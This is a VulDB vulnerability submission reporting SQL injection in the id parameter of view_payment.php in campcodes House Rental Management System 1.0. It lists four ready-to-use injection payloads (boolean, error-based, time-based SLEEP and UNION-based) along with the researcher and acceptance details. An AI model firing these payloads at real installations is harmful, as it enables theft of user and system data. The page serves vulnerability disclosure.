Submit #314199: campcodes House Rental Management System ≤1.0 SQL injectioninfo

Titlecampcodes House Rental Management System ≤1.0 SQL injection
DescriptionSQL injection vulnerability exists in id parameter of view_payment.php file of House Rental Management System Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload: id=1 AND 8765=(SELECT (CASE WHEN (8765=8765) THEN 8765 ELSE (SELECT 4736 UNION SELECT 3233) END))-- - or id=(SELECT 7508 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(7508=7508,1))),0x7178706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) or id=1 AND (SELECT 6097 FROM (SELECT(SLEEP(5)))EAQV) or id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a6a71,0x7079435944534e61487553505a5346484f655763687747544d6a7575494e7a625251735a63704357,0x7178706b71),NULL,NULL-- -
Source⚠️ https://github.com/E1CHO/cve_hub/blob/main/House%20Rental%20Management%20System/House%20Rental%20Management%20System%20-%20vuln%201.pdf
UserSSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (ID 38936)
Submission04/10/2024 16:37 (21 days ago)
Moderation04/12/2024 10:43 (2 days later)
Accepted
Accepted
VulDB EntryVDB-260483

Do you know our Splunk app?

Download it now for free!